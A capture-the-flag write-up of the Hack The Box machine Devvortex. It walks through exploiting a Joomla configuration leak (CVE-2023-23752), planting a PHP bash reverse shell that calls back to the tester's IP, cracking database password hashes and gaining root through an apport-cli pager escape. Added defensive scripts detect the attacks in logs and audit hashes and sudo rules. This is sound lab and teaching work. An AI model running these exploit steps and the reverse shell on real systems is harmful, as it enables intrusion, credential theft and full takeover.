🏴‍☠️HTB - Devvortex

p0db0t's writeup of the easy-difficulty Linux machine Devvortex from https://hackthebox.eu

Enumeration Phase:

Nmap scan

First off, I started my enumeration with an Nmap scan of 10.10.11.242. The options I regularly use are: -sC, the equivalent of --script=default, which runs Nmap's default set of enumeration scripts against the target, and -sV, which does service and version detection.

nmap -sC -sV 10.10.11.242

I added devvortex.htb to /etc/hosts next to the IP of the box, which is 10.10.11.242.

Since I still didn't have a way in, the next place to enumerate was HTTP on port 80. Navigating to http://devvortex.htb

Brute-force hidden directories:

After visiting http://devvortex.htb, I decided to brute-force hidden directories with Gobuster and didn't find anything 😢

gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200

Subdomain enumeration:

I also used Gobuster for subdomain (vhost) enumeration on this host and found dev.devvortex.htb

gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

I added dev.devvortex.htb to /etc/hosts next to the IP of the box, which is 10.10.11.242.

After visiting http://dev.devvortex.htb

Brute-force hidden directories:

I decided to brute-force hidden directories with Dirsearch and found /administrator/ and /Readme.txt 🎉

dirsearch -u dev.devvortex.htb

On the Administrator page, I found out that it is the login page of the Joomla CMS.

On the Readme.txt page, I found out that the Joomla CMS version is 4.2.

Initial Foothold:

I found out that Joomla CMS 4.2 is vulnerable to CVE-2023-23752 and used Curl to get some sensitive information, including the username and password of the user Lewis. More about CVE-2023-23752 at this link: https://nvd.nist.gov/vuln/detail/CVE-2023-23752

curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'

After logging in to the Administrator page with the credentials I found with Curl, I edited error.php, which was located at /templates/cassiopeia/error.php, and set up a reverse shell script.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>

I ran Netcat to listen for incoming connections and used Curl to request the error.php page, which triggered the reverse shell.

nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php

Boom! I got a shell as www-data.
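From the defender's side, both steps above leave a clear trace in the web server's access log: the unauthenticated request to the Joomla API with public=true (CVE-2023-23752) and the direct request for a .php file under /templates/, which Joomla never serves that way in normal use. The following Python script is an added example, not code from the writeup or from the Joomla project; it parses Apache combined-format lines and flags both patterns. The log lines are constructed for the demo and only mimic the requests shown above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" format; they are not the box's
# real logs. Line 2 mimics the CVE-2023-23752 config request, line 4 a direct
# hit on a template PHP file.
SAMPLE_ACCESS_LOG = """\
10.10.14.175 - - [26/Nov/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.175 - - [26/Nov/2023:10:01:05 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1864 "-" "curl/7.88.1"
10.10.14.175 - - [26/Nov/2023:10:02:10 +0000] "GET /administrator/index.php HTTP/1.1" 200 7100 "-" "Mozilla/5.0"
10.10.14.175 - - [26/Nov/2023:10:03:30 +0000] "GET /templates/cassiopeia/error.php HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.0.2.7 - - [26/Nov/2023:10:04:00 +0000] "GET /templates/cassiopeia/css/template.min.css HTTP/1.1" 200 40211 "http://dev.devvortex.htb/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Joomla 4 web-services API prefix; CVE-2023-23752 let unauthenticated clients
# read endpoints under it (config/application among them) by appending public=true.
API_PREFIX = "/api/index.php/v1/"
# Joomla routes template output through index.php; a direct request for a .php
# file under /templates/ is unusual and matches how the shell above was triggered.
TEMPLATE_PHP_RE = re.compile(r"^/templates/[^/]+/.*\.php$", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def scan_access_log(text):
    """Return one finding per line that matches either Joomla abuse pattern."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        path = unquote(parts.path)
        query = parse_qs(parts.query)
        rule = None
        if path.startswith(API_PREFIX) and query.get("public") == ["true"]:
            rule = "joomla-api-public-bypass"
        elif TEMPLATE_PHP_RE.match(path):
            rule = "template-php-direct-request"
        if rule:
            findings.append({"rule": rule, "ip": rec["ip"], "ts": rec["ts"],
                             "path": path, "status": rec["status"]})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} {f['rule']} {f['path']} -> {f['status']}")
```

A 200 on the API rule means the instance was unpatched when the request arrived and the configuration (database credentials included) should be treated as leaked; rotating the database password and the Joomla admin password is the response, not just patching. The template rule also catches the write itself only indirectly, so pairing it with file-integrity monitoring on the templates directory closes the gap.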

Owning User:

The credentials I found with Curl also included a database name, so I went on to check MySQL.

mysql -u lewis -p
show databases;
use joomla
show tables;
select * from sd4fg_users;

Bingo 🎉 I found the hash of Lewis and saved it locally in a .txt file.

echo 'HASH' >> hash.txt

I cracked the hash of Logan using John the Ripper.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt

Sweet! I logged in as the user Logan via SSH.

ssh logan@devvortex.htb
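The hash cracked because the password was in a common wordlist, not because of how Joomla stored it; still, an administrator who has just learned the users table was read should check what the stored values actually are before forcing resets. The script below is an added example and not part of the writeup or of Joomla: it classifies each stored password string as Joomla's current bcrypt format (with its cost factor), the legacy salted-MD5 "hash:salt" format of pre-3.2 installs, or something unrecognised, and flags the accounts that need attention. The rows and hash strings are constructed placeholders.

```python
import re

# Constructed sample rows shaped like Joomla's users table (the page's table
# was sd4fg_users); the hash strings are placeholders, not real hashes.
SAMPLE_ROWS = [
    {"username": "lewis",  "password": "$2y$10$" + "a" * 53},
    {"username": "logan",  "password": "$2y$08$" + "b" * 53},
    {"username": "legacy", "password": "5f4dcc3b5aa765d61d8327deb882cf99:xYz123"},
    {"username": "odd",    "password": "not-a-hash"},
]

# Joomla 3.2+ and Joomla 4 store bcrypt: $2y$<cost>$<22-char salt><31-char hash>.
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
# Pre-3.2 installs stored md5(password + salt) as "<32 hex>:<salt>".
LEGACY_MD5_RE = re.compile(r"^[0-9a-f]{32}:.+$")
MIN_BCRYPT_COST = 10  # Joomla's default work factor; anything lower is treated as weak


def classify_hash(stored):
    """Return (format, cost, weak) for one stored password string."""
    m = BCRYPT_RE.match(stored)
    if m:
        cost = int(m.group(1))
        return "bcrypt", cost, cost < MIN_BCRYPT_COST
    if LEGACY_MD5_RE.match(stored):
        return "md5-salted-legacy", None, True
    return "unknown", None, True


def audit_password_hashes(rows):
    """Classify every row; 'weak' marks accounts whose stored form is below baseline."""
    report = []
    for r in rows:
        fmt, cost, weak = classify_hash(r["password"])
        report.append({"username": r["username"], "format": fmt,
                       "cost": cost, "weak": weak})
    return report


def weak_accounts(rows):
    """Usernames whose hashes should trigger a forced password reset."""
    return [e["username"] for e in audit_password_hashes(rows) if e["weak"]]


if __name__ == "__main__":
    for e in audit_password_hashes(SAMPLE_ROWS):
        print(f"{e['username']:8} {e['format']:18} cost={e['cost']} weak={e['weak']}")
```

The caveat is that a cost-10 bcrypt still falls to a wordlist run when the password itself is in the list, as happened here, so this audit only tells you which accounts are stored worse than the baseline; after a configuration leak like the one above, every account's password and the database credentials get rotated regardless of format.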

Owning Root:

The sudo -l command gave me some interesting output.

sudo -l

I found out that apport-cli is vulnerable to CVE-2023-1326. More about CVE-2023-1326 at this link: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023

sudo apport-cli -c /bin/mysql less
v
!
id
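The root cause on the defender's side is a sudo rule that grants a program which hands the user an interactive pager. The script below is an added example, not from the writeup or from Ubuntu's apport package: it parses sudoers-style rules and flags commands that run a pager or editor as root, unrestricted ALL grants for non-root users, and NOPASSWD entries. The sample rules are constructed for the demo; the box's actual sudo -l output is not reproduced in the writeup.

```python
import os
import re

# Constructed sudoers-style text for illustration only.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root ALL=(ALL:ALL) ALL
logan ALL=(ALL) /usr/bin/apport-cli
deploy ALL=(root) NOPASSWD: /usr/local/bin/deploy.sh
backup ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/tail /var/log/syslog
"""

# Programs that give the caller an interactive pager or editor; run as root they
# can be escaped to a root shell (apport-cli's pager use is CVE-2023-1326).
PAGER_OR_EDITOR = {"apport-cli", "less", "more", "man", "vi", "vim", "view", "nano"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")


def parse_rule(line):
    """Parse one 'user host=(runas) [TAG:] cmd, cmd' rule; None for comments and Defaults."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    cmds, nopasswd = [], False
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        tag = TAG_RE.match(spec)
        tag_text = tag.group(0) if tag else ""
        # In sudoers a tag stays in effect for the following commands until changed.
        if "NOPASSWD:" in tag_text:
            nopasswd = True
        elif "PASSWD:" in tag_text:
            nopasswd = False
        cmds.append({"nopasswd": nopasswd, "cmd": spec[len(tag_text):].strip()})
    return {"user": m.group("user"), "runas": m.group("runas"), "cmds": cmds}


def audit_sudoers(text):
    """Return one finding per granted command that has at least one risk reason."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        for c in rule["cmds"]:
            parts = c["cmd"].split()
            if not parts:
                continue
            binary = "ALL" if parts[0] == "ALL" else os.path.basename(parts[0])
            reasons = []
            if binary == "ALL" and rule["user"] != "root":
                reasons.append("unrestricted-ALL")
            if binary in PAGER_OR_EDITOR:
                reasons.append(f"pager-or-editor:{binary}")
            if c["nopasswd"]:
                reasons.append("NOPASSWD")
            if reasons:
                findings.append({"user": rule["user"], "cmd": c["cmd"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']:8} {f['cmd']:35} {', '.join(f['reasons'])}")
```

For the apport-cli case the fix is to remove the grant or install an apport build that contains the fix tracked in the Launchpad bug above; an allow-list of exact commands does not help when the allowed command can itself spawn a pager. Real deployments also need /etc/sudoers.d/* and any Cmnd_Alias expansion fed through the same check, which this parser does not do.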
